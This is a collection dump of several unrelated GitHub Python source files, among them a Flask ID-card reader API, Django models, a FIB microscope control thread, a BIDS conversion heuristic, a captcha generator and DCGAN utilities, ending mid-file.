smallSerie.getDataInIt(image)\n largeSerie = largeSerie.getDataInIt(image)\n\n return {\n 'endOfValidity': endOfValidity,\n 'smallSeries': smallSerie,\n 'largeSeries': largeSerie,\n }\n\n\n# handle post request having image in request data\n# return the same image in response\n@app.route(\"/api\", methods=['POST'])\ndef mainAPI():\n result = dict()\n\n if \"CIN1\" in request.files:\n file_CIN1 = request.files[\"CIN1\"]\n result[\"CIN1\"] = getCinFront(file_CIN1)\n\n if \"CIN2\" in request.files:\n file_CIN2 = request.files[\"CIN2\"]\n result[\"CIN2\"] = getCinBack(file_CIN2)\n if \"PERMIS1\" in request.files:\n file_PERMIS1 = request.files[\"PERMIS1\"]\n result[\"PERMIS1\"] = getPermisFront(file_PERMIS1)\n\n if \"PERMIS2\" in request.files:\n file_PERMIS2 = request.files[\"PERMIS2\"]\n result[\"PERMIS2\"] = getPermisBack(file_PERMIS2)\n\n # print(result)\n\n # print(result)\n\n return {\n 'status': 'success',\n 'result': result\n }\n\n@app.route(\"/api/test\", methods=['GET'])\ndef testAPI():\n return {\n 'status': 'success',\n 'result': 'test'\n }\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')","repo_name":"Diettrich/NARSA-doc-reader","sub_path":"python-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17445953667","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\n# Create your models here.\nclass Driver(models.Model):\n\n first_name = models.CharField(max_length=40)\n last_name = models.CharField(max_length=40)\n email = models.EmailField()\n date_hired = models.DateField()\n date_fired = models.DateField(null=True)\n active = models.BooleanField(default=True)\n profile = models.ImageField(upload_to='profiles_driver/')\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return f'{self.first_name} {self.last_name}'\n\n\nclass HistoryDriver(models.Model):\n message = models.TextField(max_length=500)\n created_at = models.DateTimeField(auto_now_add=True)\n active = models.BooleanField(default=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.message\n","repo_name":"razvantr/Final_Project","sub_path":"driver/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21802739606","text":"from PyQt5.QtCore import QThread, QMutex, QWaitCondition\n\nfrom lib.DIC_lib import *\n\n\nclass FibProcessThread(QThread):\n def __init__(self, xml, preset=\"2. Fine milling, polishing\", parent=None):\n \"\"\"\n Constructor.\n\n :param xml: xml text\n :param preset: preset\n :param parent: parent\n \"\"\"\n\n QThread.__init__(self, parent)\n\n self.preset = preset\n self.parent = parent\n self.xml = xml\n\n def __del__(self):\n self.wait()\n\n def run(self):\n \"\"\"\n Runs an DrawBeam external xml layer in a new thread according to SharkSEM Remote Control DrawBeam Extension.\n \"\"\"\n\n self.connection = self.parent.connection\n\n # parsing the xml text\n layer = parseString(self.xml)\n\n # get settings from xml layer\n self.settings = layer.getElementsByTagName(\"Settings\")[0]\n\n # set view field\n wf = float(self.settings.getAttribute(\"WriteFieldSize\")) # in meters\n\n self.connection.logger.info(\"Setting write field to %.1f um\" % (wf * 1e6))\n self.connection.FibSetViewField(wf * 1e3) # conversion to mm\n\n while self.parent.ProcessTab.paused:\n time.sleep(0.1)\n\n # check if fib is ready\n self.connection.checkFibCfg()\n\n # check if preset exists\n presets = self.connection.FibListPresets()\n if presets.count(self.preset) > 0:\n self.connection.logger.info(\"changing preset to : %s\" % self.preset)\n self.connection.FibSetPreset(self.preset)\n else:\n raise FibError(\"The FIB preset: %s doesn't exist\" % self.preset)\n\n FCC = self.connection.FibReadFCCurr() # in pA\n self.connection.logger.info(\"Faraday cup current = %f pA\" % FCC)\n\n # update beam current in xml project to actual value for time estimation correction\n if FCC <= 0:\n # in demo mode no current detected - 100pA set in such a case\n self.connection.logger.info(\"Demo mode detected,FC current increased 100x to value = %e pA\" % (\n float(self.settings.getAttribute(\"BeamCurrent\")) * 100 * 1e12))\n self.settings.setAttribute(\"BeamCurrent\", \"%e\" % (float(self.settings.getAttribute(\"BeamCurrent\")) * 100))\n else:\n self.connection.logger.info(\"Beam current=0. Updating layer current from %s A to %.2e A\" % (\n self.settings.getAttribute(\"BeamCurrent\"), FCC * 1e-12))\n self.settings.setAttribute(\"BeamCurrent\", \"%.2e\" % (FCC * 1e-12))\n\n while self.parent.ProcessTab.paused:\n time.sleep(0.1)\n\n \n\n # generating updated xml text\n xml = layer.toxml()\n self.connection.logger.debug(xml)\n self.connection.logger.info(\"Unloading layer with status: %i\" % self.connection.DrwUnloadLayer(0))\n self.connection.logger.info(\"Loading layer into DrawBeam with status:%i\" % (\n self.connection.DrwLoadLayer(0, xml)))\n self.connection.logger.debug(\"Any previous process is stopped ?? with status:%i\" % (self.connection.DrwStop()))\n self.connection.logger.info(\"Layer started with status:%i\" % (self.connection.DrwStart(0)))\n\n status = self.connection.DrwGetStatus()\n\n self.connection.logger.info(\"Drawbeam thread Status:%i\" % (status[0]))\n\n while status[0] == 2 or status[0] == 3: # means layer is running or paused\n while self.parent.ProcessTab.paused:\n time.sleep(0.1)\n\n try:\n self.connection.logger.debug(\"\"\"Layer progress: Time: %.2f s / %.2f s ()\"\"\" % (status[2], status[1]))\n time.sleep(0.2)\n status = self.connection.DrwGetStatus()\n\n if status[0] == 1: # layer finished\n self.connection.logger.debug(\"Drawbeam Status: Layer Finished\")\n # self.terminate()\n\n if status[0] == 3:\n self.connection.logger.debug(\"Drawbeam Status: Layer paused\")\n time.sleep(1)\n else:\n self.connection.logger.debug(\"Drawbeam Status: running\")\n time.sleep(0.5)\n\n except KeyboardInterrupt:\n self.connection.logger.error(\"Keyboard Interrupt\")\n self.connection.logger.info(\"Layer stopped with status:%i\" % (self.connection.DrwStop()))\n self.connection.logger.info(\"Unloading layer with status:\", self.connection.DrwUnloadLayer(0))\n self.terminate()\n","repo_name":"JurriDluggi/AutoDIC","sub_path":"FibProcess.py","file_name":"FibProcess.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74273008857","text":"from .._tier0 import execute\nfrom .._tier0 import plugin_function\nfrom .._tier0 import Image\n\n@plugin_function(categories=['filter', 'in assistant'], priority=-1)\ndef exponential(source : Image, destination : Image = None) -> Image:\n \"\"\"Computes base exponential of all pixels values.\n \n f(x) = exp(x) \n \n Author(s): Peter Haub, Robert Haase\n \n Parameters\n ----------\n source : Image\n destination : Image, optional\n \n Returns\n -------\n destination\n \n Examples\n --------\n >>> import pyclesperanto_prototype as cle\n >>> cle.exponential(source, destination)\n \n References\n ----------\n .. [1] https://clij.github.io/clij2-docs/reference_exponential\n \"\"\"\n\n\n parameters = {\n \"src\":source,\n \"dst\":destination\n }\n\n execute(__file__, '../clij-opencl-kernels/kernels/exponential_' + str(len(destination.shape)) + 'd_x.cl', 'exponential_' + str(len(destination.shape)) + 'd', destination.shape, parameters)\n return destination\n","repo_name":"clEsperanto/pyclesperanto_prototype","sub_path":"pyclesperanto_prototype/_tier1/_exponential.py","file_name":"_exponential.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"68"} +{"seq_id":"33967979524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n作者:liux\n日期:2018/8/6 14:03\n功能:随机生成不同的验证码图片\n\"\"\"\n\n\nimport random\nimport os\nfrom PIL import ImageDraw,ImageFont,Image,ImageFilter\n\n\nPATH=os.getcwd()\n#Arial.ttf 需要自己找,一般电脑自带C:\\Windows\\Fonts\\Arial.ttf\nfont_file_path=PATH+'/pyUtils/fontSysFiles/Arial.ttf'\n\ndef random_check_code(width=120,height=30,char_length=5):\n code = []\n # 背景颜色,默认为白色\n img = Image.new(mode='RGB', size=(width, height), color=(255, 255, 255))\n draw = ImageDraw.Draw(img, mode='RGB')\n\n def rndChar():\n \"\"\"\n 生成随机字母\n :return:\n \"\"\"\n return chr(random.randint(65, 90))\n\n def rndColor():\n \"\"\"\n 生成随机颜色\n :return:\n \"\"\"\n return (random.randint(0, 255), random.randint(10, 255), random.randint(64, 255))\n\n # 写文字\n font = ImageFont.truetype(font_file_path, 25)\n # font = ImageFont.load_default().font\n for i in range(char_length):\n char = rndChar()\n code.append(char)\n h = random.randint(0, 4)\n draw.text([i * width / char_length, h], char, font=font, fill=rndColor())\n\n # 写干扰点\n for i in range(40):\n draw.point([random.randint(0, width), random.randint(0, height)], fill=rndColor())\n\n # 写干扰圆圈\n for i in range(40):\n draw.point([random.randint(0, width), random.randint(0, height)], fill=rndColor())\n x = random.randint(0, width)\n y = random.randint(0, height)\n draw.arc((x, y, x + 4, y + 4), 0, 90, fill=rndColor())\n\n # 画干扰线\n for i in range(5):\n x1 = random.randint(0, width)\n y1 = random.randint(0, height)\n x2 = random.randint(0, width)\n y2 = random.randint(0, height)\n draw.line((x1, y1, x2, y2), fill=rndColor())\n\n img = img.filter(ImageFilter.EDGE_ENHANCE_MORE) #加滤镜,可以增加颜色的不同\n return img, ''.join(code)","repo_name":"LiuX666/Python_practice","sub_path":"loginCheckCode/pyUtils/randomCheckCode.py","file_name":"randomCheckCode.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"27472388045","text":"import os, re, glob\nfrom frozendict import frozendict\nimport nibabel.nicom.dicomwrappers as nb_dw\nfrom heudiconv.heuristics import reproin\nfrom heudiconv.heuristics.reproin import (\n OrderedDict,\n create_key,\n get_dups_marked,\n parse_series_spec,\n sanitize_str,\n lgr,\n series_spec_fields,\n)\n\ndef load_example_dcm(seqinfo):\n ex_dcm_path = sorted(glob.glob(os.path.join('/tmp', 'heudiconv*', '*', seqinfo.dcm_dir_name, seqinfo.example_dcm_file)))[0]\n return nb_dw.wrapper_from_file(ex_dcm_path)\n\ndef custom_seqinfo(wrapper, series_files):\n #print('calling custom_seqinfo', wrapper, series_files)\n\n pedir_pos = None\n if hasattr(wrapper, 'csa_header'):\n pedir_pos = wrapper.csa_header[\"tags\"][\"PhaseEncodingDirectionPositive\"][\"items\"]\n pedir_pos = pedir_pos[0] if len(pedir_pos) else None\n custom_info = frozendict({\n 'patient_name': wrapper.dcm_data.PatientName,\n 'pe_dir': wrapper.dcm_data.get('InPlanePhaseEncodingDirection', None),\n 'pe_dir_pos': pedir_pos,\n 'body_part': wrapper.dcm_data.get(\"BodyPartExamined\", None),\n 'scan_options': str(wrapper.dcm_data.get(\"ScanOptions\", None)),\n 'image_comments': wrapper.dcm_data.get(\"ImageComments\", \"\"),\n 'slice_orient': str(wrapper.dcm_data.get([0x0051,0x100e]).value),\n 'echo_number': str(wrapper.dcm_data.get(\"EchoNumber\", None)),\n 'rescale_slope': wrapper.dcm_data.get(\"RescaleSlope\", None),\n })\n return custom_info\n\ndef infotoids(seqinfos, outdir):\n\n seqinfo = next(seqinfos.__iter__())\n\n #ex_dcm = load_example_dcm(seqinfo)\n\n pi = str(seqinfo.referring_physician_name)\n study_name = str(seqinfo.study_description)\n patient_name = str(seqinfo.custom['patient_name'])\n\n study_path = study_name.split(\"^\")\n\n rema = re.match(\"(([^_]*)_)?(([^_]*)_)?p([0-9]*)_([a-zA-Z]*)([0-9]*)\", patient_name)\n if rema is None:\n rema = re.match(\"(([^_]*)_)?(([^_]*)_)?(dev)_([a-zA-Z]*)([0-9]*)\", patient_name)\n if rema:\n study_name = rema.group(1)\n sub_study_name = rema.group(3)\n subject_id = rema.group(5)\n session_type = rema.group(6)\n session_id = rema.group(7)\n\n if rema is None:\n rema = re.match(\"(([^_]*)_)?([a-zA-Z0-9]*)_([a-zA-Z0-9]*)\", patient_name)\n study_name = rema.group(2)\n subject_id = rema.group(3)\n session_id = rema.group(4)\n\n locator = os.path.join(pi, *study_path)\n\n return {\n# \"locator\": locator,\n # Sessions to be deduced yet from the names etc TODO\n \"session\": session_id,\n \"subject\": subject_id,\n }\n\n\ndef get_task(s):\n mtch = re.match(\".*_task\\-([^_]+).*\", s.series_id)\n if mtch is None:\n mtch = re.match(\".*\\-task_([^_]+).*\", s.series_id)# for floc messup\n if mtch is not None:\n task = mtch.group(1).split(\"-\")\n if len(task) > 1:\n return task[1]\n return task[0]\n else:\n return None\n\n\ndef get_run(s):\n mtch = re.match(\".*run\\-([^_]+).*\", s.series_id)\n if mtch is not None:\n return mtch.group(1)\n else:\n return None\n\n\nrec_exclude = [\n \"ORIGINAL\",\n \"PRIMARY\",\n \"M\",\n \"P\",\n \"MB\",\n \"ND\",\n \"MOSAIC\",\n \"NONE\",\n \"DIFFUSION\",\n \"UNI\",\n] + [f\"TE{i}\" for i in range(9)]\n\n\ndef get_seq_bids_info(s):\n\n seq = {\n \"type\": \"anat\", # by default to make code concise\n \"label\": None,\n }\n\n seq_extra = {}\n for it in s.image_type[2:]:\n if it not in rec_exclude:\n seq_extra[\"rec\"] = it.lower()\n seq_extra[\"part\"] = \"mag\" if \"M\" in s.image_type else (\"phase\" if \"P\" in s.image_type else None)\n \n try:\n pedir = s.custom['pe_dir']\n if \"COL\" in pedir:\n pedir = \"AP\"\n else:\n pedir = \"LR\"\n pedir_pos = bool(\n s.custom['pe_dir_pos']\n )\n\n seq[\"dir\"] = pedir if pedir_pos else pedir[::-1]\n except:\n pass\n\n # label bodypart which are not brain, mainly for spine if we set the dicom fields at the console properly\n bodypart = s.custom['body_part'] #ex_dcm.dcm_data.get(\"BodyPartExamined\", None)\n if bodypart is not None and bodypart != \"BRAIN\":\n seq[\"bp\"] = bodypart.lower()\n print(seq)\n\n scan_options = s.custom['scan_options'] #ex_dcm.dcm_data.get(\"ScanOptions\", None)\n image_comments = s.custom['image_comments'] #ex_dcm.dcm_data.get(\"ImageComments\", [])\n\n # CMRR bold and dwi\n is_sbref = \"Single-band reference\" in image_comments\n print(s, is_sbref)\n\n # Anats\n if \"localizer\" in s.protocol_name.lower():\n seq[\"label\"] = \"localizer\"\n slice_orient = s.custom['slice_orient'] #ex_dcm.dcm_data.get([0x0051,0x100e]) \n# if slice_orient is not None:\n# seq['acq'] = slice_orient.value.lower()\n elif \"AAHead_Scout\" in s.protocol_name:\n seq[\"label\"] = \"scout\"\n elif (\n (s.dim4 == 1)\n and (\"T1\" in s.protocol_name)\n and (\"tfl3d1_16ns\" in s.sequence_name)\n ):\n seq[\"label\"] = \"T1w\"\n elif (\n (s.dim4 == 1) and (\"T2\" in s.protocol_name) and (\"spc_314ns\" in s.sequence_name)\n ):\n seq[\"label\"] = \"T2w\"\n elif (\n (\"*tfl3d1_16\" in s.sequence_name)\n and (s.dim4 == 1)\n and (\"mp2rage\" in s.protocol_name)\n and not (\"memp2rage\" in s.protocol_name)\n ):\n seq[\"label\"] = \"MP2RAGE\"\n if \"INV1\" in s.series_description:\n seq[\"inv\"] = 1\n elif \"INV2\" in s.series_description:\n seq[\"inv\"] = 2\n elif \"UNI\" in s.image_type:\n # seq['acq'] = 'UNI'\n seq[\"label\"] = \"UNIT1\" # TODO: validate\n\n # elif (s.dim4 == 1) and ('MTw' in s.protocol_name):\n # seq['label'] = 'MTw'\n # seq['acq'] = 'off'\n # if 'On' in s.protocol_name:\n # seq['acq'] = 'on'\n\n # GRE acquisition\n elif \"*fl3d1\" in s.sequence_name:\n seq[\"label\"] = \"MTS\"\n seq[\"mt\"] = \"on\" if scan_options == \"MT\" else \"off\"\n # do not work for multiple flip-angle, need data to find how to detect index\n seq[\"flip\"] = 2 if 'T1w' in s.series_id else 1\n\n elif \"tfl2d1\" in s.sequence_name:\n seq[\"type\"] = \"fmap\"\n seq[\"label\"] = \"TB1TFL\"\n seq[\"acq\"] = \"famp\" if \"flip angle map\" in image_comments else \"anat\"\n\n elif \"fm2d2r\" in s.sequence_name:\n seq[\"type\"] = \"fmap\"\n seq[\"label\"] = \"phasediff\" if \"phase\" in s.image_type else \"magnitude%d\"%s.custom['echo_number'] \n \n # SWI\n elif (s.dim4 == 1) and (\"swi3d1r\" in s.sequence_name):\n seq[\"type\"] = \"swi\"\n if not (\"MNIP\" in s.image_type):\n seq[\"label\"] = \"swi\"\n else:\n seq[\"label\"] = \"minIP\"\n\n # Siemens or CMRR diffusion sequence, exclude DERIVED (processing at the console)\n elif (\n (\"ep_b\" in s.sequence_name)\n or (\"ez_b\" in s.sequence_name)\n or (\"epse2d1_110\" in s.sequence_name)\n ) and not any(it in s.image_type for it in [\"DERIVED\", \"PHYSIO\"]):\n seq[\"type\"] = \"dwi\"\n seq[\"label\"] = \"sbref\" if is_sbref else \"dwi\"\n\n # dumb far-fetched heuristics, no info in dicoms see https://github.com/CMRR-C2P/MB/issues/305\n seq_extra[\"part\"] = 'phase' if s.custom['rescale_slope'] else 'mag'\n\n\n # CMRR or Siemens functional sequences\n elif \"epfid2d\" in s.sequence_name:\n seq[\"task\"] = get_task(s)\n\n # if no task, this is a fieldmap\n if \"AP\" in s.series_id and not seq[\"task\"]:\n seq[\"type\"] = \"fmap\"\n seq[\"label\"] = \"epi\"\n seq[\"acq\"] = \"sbref\" if is_sbref else \"bold\"\n else:\n seq[\"type\"] = \"func\"\n seq[\"label\"] = \"sbref\" if is_sbref else \"bold\"\n\n seq[\"run\"] = get_run(s)\n if s.is_motion_corrected:\n seq[\"rec\"] = \"moco\"\n\n \n ################## SPINAL CORD PROTOCOL #####################\n elif \"spcR_100\" in s.sequence_name:\n seq[\"label\"] = \"T2w\"\n # seq['bp'] = 'spine'\n elif \"*me2d1r3\" in s.sequence_name:\n seq[\"label\"] = \"T2starw\"\n\n if seq[\"label\"] == \"sbref\" and \"part\" in seq:\n del seq[\"part\"]\n \n return seq, seq_extra\n\n\ndef generate_bids_key(seq_type, seq_label, prefix, bids_info, show_dir=False, outtype=(\"nii.gz\",), **bids_extra):\n bids_info.update(bids_extra)\n suffix_parts = [\n None if not bids_info.get(\"task\") else \"task-%s\" % bids_info[\"task\"],\n None if not bids_info.get(\"acq\") else \"acq-%s\" % bids_info[\"acq\"],\n None if not bids_info.get(\"ce\") else \"ce-%s\" % bids_info[\"ce\"],\n None\n if not (bids_info.get(\"dir\") and show_dir)\n else \"dir-%s\" % bids_info[\"dir\"],\n None if not bids_info.get(\"rec\") else \"rec-%s\" % bids_info[\"rec\"],\n None if not bids_info.get(\"inv\") else \"inv-%d\" % bids_info[\"inv\"],\n None if not bids_info.get(\"tsl\") else \"tsl-%d\" % bids_info[\"tsl\"],\n None if not bids_info.get(\"loc\") else \"loc-%s\" % bids_info[\"loc\"],\n None if not bids_info.get(\"bp\") else \"bp-%s\" % bids_info[\"bp\"],\n None if not bids_info.get(\"run\") else \"run-%02d\" % int(bids_info[\"run\"]),\n None if not bids_info.get(\"echo\") else \"echo-%d\" % int(bids_info[\"echo\"]),\n None if not bids_info.get(\"flip\") else \"flip-%d\" % int(bids_info[\"flip\"]),\n None if not bids_info.get(\"mt\") else \"mt-%s\" % bids_info[\"mt\"],\n None if not bids_info.get(\"part\") else \"part-%s\" % bids_info[\"part\"],\n seq_label,\n ]\n # filter those which are None, and join with _\n suffix = \"_\".join(filter(bool, suffix_parts))\n \n return create_key(seq_type, suffix, prefix=prefix, outtype=outtype)\n\n\ndef infotodict(seqinfo):\n \"\"\"Heuristic evaluator for determining which runs belong where\n\n allowed template fields - follow python string module:\n\n item: index within category\n subject: participant id\n seqitem: run number during scanning\n subindex: sub index within group\n session: scan index for longitudinal acq\n \"\"\"\n\n #lgr.info(\"Processing %d seqinfo entries\", len(seqinfo))\n #lgr.info(seqinfo)\n\n info = OrderedDict()\n skipped, skipped_unknown = [], []\n current_run = 0\n run_label = None # run-\n dcm_image_iod_spec = None\n skip_derived = True\n\n outtype = (\"nii.gz\",)\n sbref_as_fieldmap = True # duplicate sbref in fmap dir to be used by topup\n #sbref_as_fieldmap = False # sbref as fieldmaps is still required to use fMRIPrep LTS.\n prefix = \"\"\n\n fieldmap_runs = {}\n all_bids_infos = {}\n\n for s in seqinfo:\n \n #ex_dcm = load_example_dcm(s)\n\n bids_info, bids_extra = get_seq_bids_info(s)\n all_bids_infos[s.series_id] = (bids_info, bids_extra)\n\n # XXX: skip derived sequences, we don't store them to avoid polluting\n # the directory, unless it is the motion corrected ones\n # (will get _rec-moco suffix)\n if (\n skip_derived\n and (s.is_derived or (\"MPR\" in s.image_type))\n and not s.is_motion_corrected\n and not \"UNI\" in s.image_type\n ):\n skipped.append(s.series_id)\n lgr.debug(\"Ignoring derived data %s\", s.series_id)\n continue\n\n seq_type = bids_info[\"type\"]\n seq_label = bids_info[\"label\"]\n\n if (seq_type == \"fmap\" and seq_label == \"epi\" and bids_extra['part']=='phase' and seq_label=='bold'):\n continue\n \n if ((seq_type == \"fmap\" and seq_label == \"epi\") or\n (sbref_as_fieldmap and seq_label == \"sbref\" and seq_type=='bold')\n ) and bids_info.get(\"part\") in [\"mag\", None]:\n pe_dir = bids_info.get(\"dir\", None)\n if not pe_dir in fieldmap_runs:\n fieldmap_runs[pe_dir] = 0\n fieldmap_runs[pe_dir] += 1\n # override the run number\n run_id = fieldmap_runs[pe_dir]\n\n # duplicate sbref to be used as fieldmap\n if sbref_as_fieldmap and seq_label == \"sbref\":\n suffix_parts = [\n \"acq-sbref\",\n None if not bids_info.get(\"ce\") else \"ce-%s\" % bids_info[\"ce\"],\n None if not pe_dir else \"dir-%s\" % bids_info[\"dir\"],\n \"run-%02d\" % run_id,\n \"epi\",\n ]\n suffix = \"_\".join(filter(bool, suffix_parts))\n template = create_key(\"fmap\", suffix, prefix=prefix, outtype=outtype)\n if template not in info:\n info[template] = []\n info[template].append(s.series_id)\n\n show_dir = seq_type in [\"fmap\", \"dwi\"] and not seq_label=='TB1TFL'\n\n template = generate_bids_key(seq_type, seq_label, prefix, bids_info, show_dir, outtype)\n\n if template not in info:\n info[template] = []\n info[template].append(s.series_id)\n \n\n if skipped:\n lgr.info(\"Skipped %d sequences: %s\" % (len(skipped), skipped))\n if skipped_unknown:\n lgr.warning(\n \"Could not figure out where to stick %d sequences: %s\"\n % (len(skipped_unknown), skipped_unknown)\n )\n\n info = dedup_bids_extra(info, all_bids_infos)\n info = get_dups_marked(info) # mark duplicate ones with __dup-0x suffix\n\n info = dict(\n info\n ) # convert to dict since outside functionality depends on it being a basic dict\n\n for k, i in info.items():\n lgr.info(f\"{k} {i}\")\n\n return info\n\n\ndef dedup_bids_extra(info, bids_infos):\n # add `rec-` or `part-` to dedup series originating from the same acquisition\n info = info.copy()\n for template, series_ids in list(info.items()):\n if len(series_ids) >= 2:\n lgr.warning(\"Detected %d run(s) for template %s: %s\",\n len(series_ids), template[0], series_ids)\n\n for extra in [\"rec\", \"part\"]:\n \n bids_extra_values = [bids_infos[sid][1].get(extra) for sid in series_ids]\n\n if len(set(bids_extra_values)) < 2:\n continue #does not differentiate series\n\n lgr.info(f\"dedup series using {extra}\")\n\n for sid in list(series_ids): #need a copy of list because we are removing elements in that loop\n\n series_bids_info, series_bids_extra = bids_infos[sid]\n\n new_template = generate_bids_key(\n series_bids_info[\"type\"],\n series_bids_info[\"label\"],\n \"\",\n series_bids_info,\n show_dir=series_bids_info[\"type\"] in [\"fmap\", \"dwi\"],\n outtype=(\"nii.gz\",),\n **{extra: series_bids_extra.get(extra)})\n\n if new_template not in info:\n info[new_template] = []\n info[new_template].append(sid)\n info[template].remove(sid)\n if not len(info[template]):\n del info[template]\n break\n return info\n","repo_name":"courtois-neuromod/ds_prep","sub_path":"mri/convert/heuristics_unf.py","file_name":"heuristics_unf.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"71426619098","text":"\"\"\" Reference\r\n 1. https://github.com/carpedm20/DCGAN-tensorflow/blob/master/model.py\r\n 2.\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.gridspec as gridspec\r\nimport os\r\nimport math\r\nimport time\r\n\r\nfrom collections import OrderedDict, defaultdict\r\nimport tensorflow as tf\r\nfrom sklearn import mixture\r\n\r\nimport warnings\r\nwarnings.simplefilter(action='ignore', category=FutureWarning)\r\n\r\n\r\n# Function to plot an MNIST image generated\r\n# - plot 8*8 images\r\ndef plot_generated_mnist_images(samples, size=(8, 8)):\r\n fig = plt.figure(figsize=size);\r\n gs = gridspec.GridSpec(size[0], size[1]);\r\n gs.update(wspace=0.05, hspace=0.05);\r\n\r\n for i, sample in enumerate(samples):\r\n ax = plt.subplot(gs[i]);\r\n plt.axis(\"off\");\r\n plt.imshow(sample.reshape(28, 28));\r\n\r\n return fig;\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef one_hot_encoder(class_numbers, num_classes):\r\n return np.eye(num_classes, dtype=float)[class_numbers];\r\n\r\n\r\nclass AttributeDict(dict):\r\n \"\"\"\r\n A class to use Dictionary in convenient way\r\n i.e object[\"key\"] => object.key\r\n \"\"\"\r\n def __getattr__(self, attr):\r\n return self[attr];\r\n\r\n def __setattr__(self, attr, value):\r\n self[attr] = value;\r\n\r\n def __hash__(self):\r\n return hash(tuple(sorted(self.items())));\r\n\r\n\r\ndef print_images(sampled_images, label, index, directory, save_all_samples=False):\r\n import matplotlib as mpl;\r\n mpl.use(\"Agg\");\r\n\r\n def un_normalize(img, cdim):\r\n img_out = np.zeros_like(img);\r\n for i in range(cdim):\r\n img_out[:, :, i] = 255.*((img[:, :, i] +1.)/2.0);\r\n\r\n img_out = img_out.astype(np.uint8);\r\n return img_out;\r\n\r\n if type(sampled_images) == np.ndarray:\r\n N, h, w, cdim = sampled_images.shape;\r\n idxs = np.random.choice(np.arange(N), size=(5, 5), replace=False);\r\n else:\r\n sampled_imgs, sampled_probs = sampled_images;\r\n sampled_images = sampled_imgs[sampled_probs.argsort()[::-1]];\r\n idxs = np.arange(5*5).reshape((5,5));\r\n N, h, w, cdim = sampled_images.shape;\r\n\r\n\r\n fig, axes = plt.subplots(5, 5);\r\n for i in range(5):\r\n for j in range(5):\r\n if cdim == 1:\r\n axes[i, j].imshow(un_normalize(sampled_images[idxs[i, j]], cdim)[:, :, 0], cmap=\"gray\");\r\n else:\r\n axes[i, j].imshow(un_normalize(sampled_images[idxs[i, j]], cdim));\r\n\r\n axes[i, j].axis(\"off\");\r\n axes[i, j].set_xticklabels([]);\r\n axes[i, j].set_yticklabels([]);\r\n axes[i, j].set_aspect(\"equal\");\r\n\r\n\r\n if not os.path.exists(directory):\r\n os.makedirs(directory);\r\n\r\n fig.savefig(os.path.join(directory + \"{}_{}.png\".format(label, index)),\r\n bbox_inches=\"tight\");\r\n plt.close(\"all\");\r\n\r\n if \"raw\" not in label.lower() and save_all_samples:\r\n np.savez_compressed(os.path.join(directory, \"samples_{}_{}.npz\".format(label, index)),\r\n samples=sampled_images);\r\n\r\n\r\nclass FigPrinter:\r\n\r\n def __init__(self, subplot_arg):\r\n import matplotlib as mpl\r\n mpl.use(\"Agg\");\r\n self.fig, self.axes = plt.subplots(*subplot_arg);\r\n\r\n def print_to_file(self, file_name, close_on_exit=True):\r\n import matplotlib as mpl\r\n mpl.use(\"Agg\");\r\n\r\n self.fig.savefig(file_name, bbox_inches=\"tight\");\r\n if close_on_exit:\r\n plt.close(\"all\");\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" A function for batch normalization layer \"\"\"\r\nclass batch_norm(object):\r\n def __init__(self, epsilon=1e-5, momentum=0.9, name=\"batch_norm\"):\r\n with tf.variable_scope(name,reuse=tf.AUTO_REUSE):\r\n self.epsilon = epsilon;\r\n self.momentum = momentum;\r\n self.name = name;\r\n\r\n def __call__(self, x, train=True):\r\n return tf.contrib.layers.batch_norm(x,\r\n decay=self.momentum,\r\n updates_collections=None,\r\n epsilon=self.epsilon,\r\n scale=True,\r\n is_training=train,\r\n scope=self.name);\r\n\r\n\r\n\"\"\" Functions for Convolution/inverse_Convolution/Full-connected layers \"\"\"\r\ndef conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n w=None, biases=None, name=\"conv2d\"):\r\n \"\"\" Make a convolution layer\r\n :param input_: input data\r\n :param output_dim: dim of output\r\n :param k_h: height of kernel(window)\r\n :param k_w: width of kernel(window)\r\n :param d_h: height of stride\r\n :param d_w: width of stride\r\n :param stddev: standard deviation for initializing w\r\n :param w: weight variables for convolution layer\r\n :param biases: bias variables for convolution layer\r\n :param name: variable name for tensorflow graph\r\n :return: output of convolution layer\r\n \"\"\"\r\n with tf.variable_scope(name,reuse=tf.AUTO_REUSE):\r\n if w is None:\r\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\r\n initializer=tf.truncated_normal_initializer(stddev=stddev));\r\n\r\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding=\"SAME\");\r\n\r\n if biases is None:\r\n biases = tf.get_variable('biases', [output_dim],\r\n initializer=tf.constant_initializer(0.0));\r\n\r\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape());\r\n return conv;\r\n\r\n\r\ndef deconv2d(input_, output_shape, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n name=\"deconv2d\", with_w=False, w=None, biases=None):\r\n \"\"\" Make a transposed_convolution layer\r\n :param input_: input data\r\n :param output_shape: shape of output\r\n :param k_h: height of kernel(window)\r\n :param k_w: width of kernel(window)\r\n :param d_h: height of stride\r\n :param d_w: width of stride\r\n :param stddev: standard deviation for initializing w\r\n :param name: variable name for 